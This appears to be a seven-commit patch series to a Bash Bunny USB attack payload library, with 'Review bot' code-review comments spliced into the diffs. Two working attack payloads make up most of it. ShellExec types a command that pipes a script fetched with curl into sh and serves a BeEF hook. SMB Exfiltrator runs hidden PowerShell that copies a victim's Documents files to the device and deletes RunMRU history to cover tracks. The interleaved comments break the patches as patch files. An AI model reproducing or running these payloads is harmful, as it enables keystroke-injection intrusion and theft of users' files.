From b30ff86c2c37920739c48713a097c80f7981226b Mon Sep 17 00:00:00 2001
From: Alex Flores
Date: Wed, 15 Mar 2017 02:30:29 -0400
Subject: [PATCH 1/7] add ShellExec payload
---
 payloads/library/ShellExec/evil.sh | 6 ++++
 payloads/library/ShellExec/hook.js | 1 +
 payloads/library/ShellExec/index.html | 12 +++++++
 payloads/library/ShellExec/payload.txt | 49 ++++++++++++++++++++++++++
 payloads/library/ShellExec/readme.md | 34 ++++++++++++++++++
 5 files changed, 102 insertions(+)
 create mode 100644 payloads/library/ShellExec/evil.sh
 create mode 100644 payloads/library/ShellExec/hook.js
 create mode 100644 payloads/library/ShellExec/index.html
 create mode 100644 payloads/library/ShellExec/payload.txt
 create mode 100644 payloads/library/ShellExec/readme.md
diff --git a/payloads/library/ShellExec/evil.sh b/payloads/library/ShellExec/evil.sh
new file mode 100644
index 00000000..5b355e78
--- /dev/null
+++ b/payloads/library/ShellExec/evil.sh
@@ -0,0 +1,6 @@
+!#/bin/bash
+
+# opens browsers to the bunny's index.html page
+
+[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
+[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1
diff --git a/payloads/library/ShellExec/hook.js b/payloads/library/ShellExec/hook.js
new file mode 100644
index 00000000..8454efc5
--- /dev/null
+++ b/payloads/library/ShellExec/hook.js
@@ -0,0 +1 @@
+alert('This is where your evil JavaScript file would go')
diff --git a/payloads/library/ShellExec/index.html b/payloads/library/ShellExec/index.html
new file mode 100644
index 00000000..c026f1ea
--- /dev/null
+++ b/payloads/library/ShellExec/index.html
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+Nothing to see here!
+
+
+
+
+
diff --git a/payloads/library/ShellExec/payload.txt b/payloads/library/ShellExec/payload.txt
new file mode 100644
index 00000000..970f723f
--- /dev/null
+++ b/payloads/library/ShellExec/payload.txt
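Review bot: The interpreter line in evil.sh is mistyped as `!#/bin/bash`; it should be `#!/bin/bash`, since as written the first line is not a comment or an interpreter directive and is handed to the shell as a command, and the file only runs at all because the caller pipes it into `sh` explicitly. The readme added in the same commit lists this file as `evil.py`, so either the filename or the readme entry should be corrected to match. The two `uname` tests repeat the same hard-coded `http://172.16.64.1` URL; assigning it once to a variable would keep the two branches from drifting apart.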
@@ -0,0 +1,49 @@
+#!/bin/bash
+
+# Title: ShellExec
+# Author: audibleblink
+# Target: Mac/Linux
+# Version: 1.0
+#
+# Create a web server on the BashBunny and forces
+# the victim download and execute a script.
+#
+# White | Ready
+# Ammber blinking | Waiting for server
+# Blue blinking | Attacking
+# Green | Finished
+
+LED R G B
+ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+
+source bunny_helpers.sh
+
+# switch to payload directory
+cd /root/udisk/payloads/$SWITCH_POSITION
+
+# starting server
+LED R G 500
+python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log &
+
+# wait until port is listening
+while ! nc -z $HOST_IP 80; do sleep 0.2; done
+
+# attack commences
+LED B 500
+
+Q GUI SPACE
+Q DELAY 300
+Q STRING terminal
+Q DELAY 100
+Q ENTER
+Q DELAY 2000
+
+# Q ALT F2 # swap with block above for linux
+# Q DELAY 100
+
+Q STRING curl "http://$HOST_IP/evil.sh" \| sh
+# in case curl isn't installed
+# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
+Q ENTER
+
+LED G
diff --git a/payloads/library/ShellExec/readme.md b/payloads/library/ShellExec/readme.md
new file mode 100644
index 00000000..3caa2bf8
--- /dev/null
+++ b/payloads/library/ShellExec/readme.md
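Review bot: `cd /root/udisk/payloads/$SWITCH_POSITION` is unquoted and its result is never checked, and the Python server started a few lines later publishes whatever the current directory is, so a failed `cd` would serve the directory the script happened to start in instead of the payload folder; write it as `cd "/root/udisk/payloads/$SWITCH_POSITION" || exit 1`. The `while ! nc -z $HOST_IP 80` loop has no upper bound, so if the server never binds (port already in use, python absent) the script spins forever with the LED in the waiting state rather than failing visibly; a capped retry counter that ends in a red LED and `exit 1` would make that failure observable. Note that the served directory also contains payload.txt and server.log themselves, which deserves a comment if it is intended. The header comment misspells "Ammber" and "forces the victim download and execute" is missing a "to".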
@@ -0,0 +1,34 @@
+# ShellExec
+
+Author: audibleblink
+Version: 1.0
+
+## Description
+
+Serves malicious scripts or web pages from the Bunny and forces
+victims to curl and execute those scripts. Scripts can also force
+browsers to open a url on the bunny to do things like serve BeEF
+hooks.
+
+## Configuration
+
+evil.py - script that is fetched with DuckyScript
+(provided script opens a web page that serves a BeEF hook )
+
+hook.js - the aforementioned BeEF hook
+
+index.html - BeEF hook delivery page
+
+## Requirements
+
+Just plug and play
+
+## Status
+
+| LED | Status |
+| --------- | ----------- |
+| White | Ready |
+| Amber blinking | Waiting for server |
+| Blue blinking | Attacking |
+| Green | Finished |
+
From 448aea41c39700ba78766e04cdf8628b61558842 Mon Sep 17 00:00:00 2001
From: Alex Flores
Date: Thu, 16 Mar 2017 18:07:15 -0400
Subject: [PATCH 2/7] monkey patch fqdn search in BaseHTTPServer
---
 payloads/library/ShellExec/payload.txt | 21 ++++++++++++++++++---
 1 file changed, 18 insertions(+), 3 deletions(-)
diff --git a/payloads/library/ShellExec/payload.txt b/payloads/library/ShellExec/payload.txt
index 970f723f..48cda887 100644
--- a/payloads/library/ShellExec/payload.txt
+++ b/payloads/library/ShellExec/payload.txt
@@ -18,12 +18,27 @@ ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
 source bunny_helpers.sh
-# switch to payload directory
-cd /root/udisk/payloads/$SWITCH_POSITION
+payload_dir=/root/udisk/payloads/$SWITCH_POSITION
+log_file=$payload_dir/shellexec.log
+
+cd $payload_dir
 # starting server
 LED R G 500
-python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log &
+
+cat <> $log_file &
+import SimpleHTTPServer
+import BaseHTTPServer
+import SocketServer
+
+#Disable logging DNS lookups
+BaseHTTPServer.BaseHTTPRequestHandler.address_string = lambda self: str('$TARGET_IP')
+
+settings = ('$HOST_IP',80)
+Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
+httpd = SocketServer.TCPServer(settings, Handler)
+httpd.serve_forever();
+EOF
 # wait until port is listening
 while ! nc -z $HOST_IP 80; do sleep 0.2; done
From 8582c6237623e1c3fcc7da67b11663b40d119a48 Mon Sep 17 00:00:00 2001
From: Alex Flores
Date: Thu, 16 Mar 2017 18:22:38 -0400
Subject: [PATCH 3/7] iptables are always the answer
---
 payloads/library/ShellExec/payload.txt | 18 ++++--------------
 1 file changed, 4 insertions(+), 14 deletions(-)
diff --git a/payloads/library/ShellExec/payload.txt b/payloads/library/ShellExec/payload.txt
index 48cda887..bdf77e61 100644
--- a/payloads/library/ShellExec/payload.txt
+++ b/payloads/library/ShellExec/payload.txt
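Review bot: The `address_string` override returns the literal `$TARGET_IP` for every request, so the access log written to `$log_file` no longer records the real peer and any client on the link is logged under the same address. The usual way to skip the reverse lookup while keeping the log truthful is `lambda self: self.client_address[0]`. The new `cd $payload_dir` is still unquoted and unchecked (`cd "$payload_dir" || exit 1`), and `log_file` is created inside the directory being served, so the log is itself downloadable from the server. The `cat <> $log_file &` line appears garbled in this rendering, presumably a heredoc redirection, so the exact redirect cannot be reviewed here.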
@@ -26,22 +26,12 @@ cd $payload_dir
 # starting server
 LED R G 500
-cat <> $log_file &
-import SimpleHTTPServer
-import BaseHTTPServer
-import SocketServer
-
-#Disable logging DNS lookups
-BaseHTTPServer.BaseHTTPRequestHandler.address_string = lambda self: str('$TARGET_IP')
-
-settings = ('$HOST_IP',80)
-Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
-httpd = SocketServer.TCPServer(settings, Handler)
-httpd.serve_forever();
-EOF
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80
 # wait until port is listening
-while ! nc -z $HOST_IP 80; do sleep 0.2; done
+while ! nc -z localhost 80; do sleep 0.2; done
 # attack commences
 LED B 500
From c9e41fc7d9ccee5cd31d16b067e7b3bacad8dbe8 Mon Sep 17 00:00:00 2001
From: Sebastian Kinne
Date: Tue, 21 Mar 2017 08:19:12 +1100
Subject: [PATCH 4/7] Payload: Fixed CaptivePortal
---
 payloads/library/Captiveportal/README.md | 2 +-
 payloads/library/Captiveportal/payload.txt | 11 +++++------
 2 files changed, 6 insertions(+), 7 deletions(-)
diff --git a/payloads/library/Captiveportal/README.md b/payloads/library/Captiveportal/README.md
index 0d70593d..d6dc1789 100644
--- a/payloads/library/Captiveportal/README.md
+++ b/payloads/library/Captiveportal/README.md
@@ -1,7 +1,7 @@
 # Captive Portal for the Bash Bunny
 Author: Sebkinne
-Version: 1.0
+Version: 1.1
 ## Description
diff --git a/payloads/library/Captiveportal/payload.txt b/payloads/library/Captiveportal/payload.txt
index c044eeac..13e8649e 100644
--- a/payloads/library/Captiveportal/payload.txt
+++ b/payloads/library/Captiveportal/payload.txt
@@ -2,10 +2,7 @@
 #
 # Title: Captiveportal
 # Author: Sebkinne
-# Version: 1.0
-
-# Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal
-https://forums.hak5.org/index.php?/topic/40237-install-tools/
+# Version: 1.1
 # Add or remove inputs here
 INPUTS=(username password)
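Review bot: `iptables -A OUTPUT -p udp --dport 53 -j DROP` appends a fresh rule on every run and nothing ever removes it, so rules accumulate across runs and the Bunny's own outbound DNS stays blocked after the payload has finished; pair it with `trap 'iptables -D OUTPUT -p udp --dport 53 -j DROP' EXIT` so the rule is withdrawn when the script ends. The server also now listens on the SimpleHTTPServer default of every interface rather than on `$HOST_IP` as it did before, a widening of exposure the commit message does not mention and which deserves a comment on the `python -m SimpleHTTPServer 80` line. The script continues outside this hunk in both directions.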
@@ -18,6 +15,9 @@ ATTACKMODE RNDIS_ETHERNET
 # DO NOT EDIT BELOW THIS LINE #
 ##################################################################
+source bunny_helpers.sh
+WORKINGPATH="/root/udisk/payloads/$SWITCH_POSITION"
+
 # Sets up iptable forwarding and filters
 function setupNetworking() {
 echo 1 > /proc/sys/net/ipv4/ip_forward
@@ -30,8 +30,7 @@ function setupNetworking() {
 # Find payload directory and execute payload
 function startCaptiveportal() {
-# cd $(dirname $(find /root/udisk/payloads/ -name portal.html))
- cd /root/udisk/payloads/$SWITCH_POSITION
+ cd $WORKINGPATH
 chmod +x captiveportal
 ./captiveportal ${INPUTS[@]}
 }
From 42819e4e6b519e53247cae1c33f05acaf8006560 Mon Sep 17 00:00:00 2001
From: Darren Kitchen
Date: Tue, 21 Mar 2017 14:12:41 +0700
Subject: [PATCH 5/7] Add SMB Exfiltrator Payload
This is an awesome payload check out Hak5 episode 2202
---
 payloads/library/smb_exfiltrator/payload.txt | 115 +++++++++++++++++++
 payloads/library/smb_exfiltrator/readme.md | 28 +++++
 2 files changed, 143 insertions(+)
 create mode 100644 payloads/library/smb_exfiltrator/payload.txt
 create mode 100644 payloads/library/smb_exfiltrator/readme.md
diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt
new file mode 100644
index 00000000..06310fa0
--- /dev/null
+++ b/payloads/library/smb_exfiltrator/payload.txt
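Review bot: `cd $WORKINGPATH` in startCaptiveportal is unquoted and its result is not checked, so if the directory is missing the function goes on to `chmod +x captiveportal` and run `./captiveportal` from whatever the current directory happens to be; write it as `cd "$WORKINGPATH" || return 1`. The unquoted use is also inconsistent with the new `WORKINGPATH="/root/udisk/payloads/$SWITCH_POSITION"` definition in the first hunk, which does quote the expansion. `${INPUTS[@]}` on the following line should be `"${INPUTS[@]}"` so each input name is passed as one word even if it contains whitespace. The body of setupNetworking continues outside the first hunk.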
@@ -0,0 +1,115 @@
+#!/bin/bash
+#
+# Title: SMB Exfiltrator
+# Author: Hak5Darren
+# Version: 1.0
+# Category: Exfiltration
+# Target: Windows XP SP3+ (Powershell)
+# Attackmodes: HID, Ethernet
+#
+#
+# Red Blink Fast.......Impacket not found
+# Red Blink Slow.......Target did not acquire IP address
+# Amber Blink Fast.....Initialization
+# Amber................HID Stage
+# Purple Blink Fast....Ethernet Stage
+# Blue Interstitial....Receiving Files
+# White................Moving loot to mass storage
+# Green................Finished
+#
+# OPTIONS
+LOOTDIR=/root/udisk/loot/smb_exfiltrator
+EXFILTRATE_FILES="*.pdf"
+CLEARTRACKS="yes" # yes or no
+
+# Initialization
+LED R G 100
+
+
+# Check for impacket. If not found, blink fast red.
+if [ ! -d /pentest/impacket/ ]; then
+ LED R 100
+ exit 1
+fi
+
+
+# HID STAGE
+# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
+# Once found, initiates file copy and exits
+LED R G
+ATTACKMODE HID
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK ENTER
+
+# Clear tracks?
+if [ $CLEARTRACKS == "yes" ]; then
+ QUACK DELAY 500
+ QUACK GUI r
+ QUACK DELAY 500
+ QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+ QUACK ENTER
+fi
+
+
+# ETHERNET STAGE
+LED R B 100
+ATTACKMODE RNDIS_ETHERNET
+
+
+# Setup SMB server to receive loot in staging area
+mkdir -p /root/loot/smb_exfiltrator/temp/
+# house cleaning
+rm -rf /root/loot/smb_exfiltrator/temp/*
+# Fire up SMB Server
+/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &
+
+
+# Source bunny_helpers.sh to get environment variables
+source bunny_helpers.sh
+
+
+# Give target a chance to start exfiltration
+sleep 2
+
+
+# Make loot directory based on hostname (increment for multiple uses)
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+# If hostname is blank set it to "noname"
+[[ -z "$HOST" ]] && HOST="noname"
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+
+
+# Check target IP address. If unset, blink slow red.
+if [ -z "${TARGET_IP}" ]; then
+ LED R 1000
+ exit 1
+fi
+
+
+# Wait until exfiltration is complete
+last=0
+current=1
+while [ "$last" != "$current" ]; do
+ last=$current
+ current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
+ LED B
+ sleep 1
+ LED R B 100
+ sleep 9
+ # Files are still being copied. Loop.
+ # (Issue may exist if file takes longer than 10s to copy)
+done
+
+
+# Move files from staging area to loot directory
+LED R G B
+mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
+sync; sleep 1; sync
+
+# Trap is clean
+LED G
diff --git a/payloads/library/smb_exfiltrator/readme.md b/payloads/library/smb_exfiltrator/readme.md
new file mode 100644
index 00000000..dc0fbbb0
--- /dev/null
+++ b/payloads/library/smb_exfiltrator/readme.md
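Review bot: `COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)` parses `ls` output through an unquoted glob, so on a first run with no match `ls` reports an error to stderr, and `$HOST*` also counts every other hostname that merely starts with the same prefix; replace it with `shopt -s nullglob`, `existing=("$LOOTDIR/$HOST"-*)` and `COUNT=$(( ${#existing[@]} + 1 ))`. `if [ $CLEARTRACKS == "yes" ]` leaves the variable unquoted (`[[ "$CLEARTRACKS" == "yes" ]]`), and `mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT` hands the literal pattern to `mv` when the staging directory is empty, so a run that received nothing ends in an error rather than the green LED. The `TARGET_IP` check sits after the loot directory has already been created, so a failed run still leaves an empty `$HOST-$COUNT` directory behind. The closing comment `# Trap is clean` does not describe the `LED G` line beneath it; either drop it or say what it refers to.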
@@ -0,0 +1,28 @@
+# SMB Exfiltrator
+
+* Author: Hak5Darren
+* Version: Version 1.0
+* Target: Windows XP SP3+ (Powershell)
+* Category: Exfiltration
+* Attackmodes: HID, Ethernet
+
+## Description
+
+Exfiltrates select files from users's documents folder via SMB.
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-#
+
+## Configuration
+
+Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired.
+
+## STATUS
+
+| LED | Status |
+| ------------------- | -------------------------------------- |
+| Red (fast blink) | Impacket not found in /pentest |
+| Red (slow blink) | Setup Failed. Target didn't obtain IP |
+| Amber | Initialization |
+| Purple (fast blink) | Switching to Mass Storage (optional) |
+| Blue (interupt) | Receiving files |
+| White | Files received, moving to mass storage |
+| Green | Finished |
From 2978c85d6a821d5ad5581ef596adae85485093b5 Mon Sep 17 00:00:00 2001
From: Surreal
Date: Wed, 22 Mar 2017 16:13:32 -0400
Subject: [PATCH 6/7] Updated smb_exfiltrator to be more hidden
Modified -WindowStyle to be hidden instead of minimized
---
 payloads/library/smb_exfiltrator/payload.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt
index 06310fa0..850bfa80 100644
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -40,7 +40,7 @@ LED R G
 ATTACKMODE HID
 QUACK GUI r
 QUACK DELAY 500
-QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
 QUACK ENTER
 # Clear tracks?
@@ -48,7 +48,7 @@ if [ $CLEARTRACKS == "yes" ]; then
 QUACK DELAY 500
 QUACK GUI r
 QUACK DELAY 500
- QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+ QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
 QUACK ENTER
 fi
From 67005a8b0dbb67fbc80b46299cdcd73364b5f852 Mon Sep 17 00:00:00 2001
From: Darren Kitchen
Date: Thu, 23 Mar 2017 07:55:59 +0700
Subject: [PATCH 7/7] Updated LED status and added discussion link
---
 payloads/library/smb_exfiltrator/readme.md | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/payloads/library/smb_exfiltrator/readme.md b/payloads/library/smb_exfiltrator/readme.md
index dc0fbbb0..d5678884 100644
--- a/payloads/library/smb_exfiltrator/readme.md
+++ b/payloads/library/smb_exfiltrator/readme.md
@@ -21,8 +21,11 @@ Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to des
 | ------------------- | -------------------------------------- |
 | Red (fast blink) | Impacket not found in /pentest |
 | Red (slow blink) | Setup Failed. Target didn't obtain IP |
-| Amber | Initialization |
-| Purple (fast blink) | Switching to Mass Storage (optional) |
+| Purple | HID Stage |
+| Purple (fast blink) | Ethernet Stage |
 | Blue (interupt) | Receiving files |
 | White | Files received, moving to mass storage |
 | Green | Finished |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")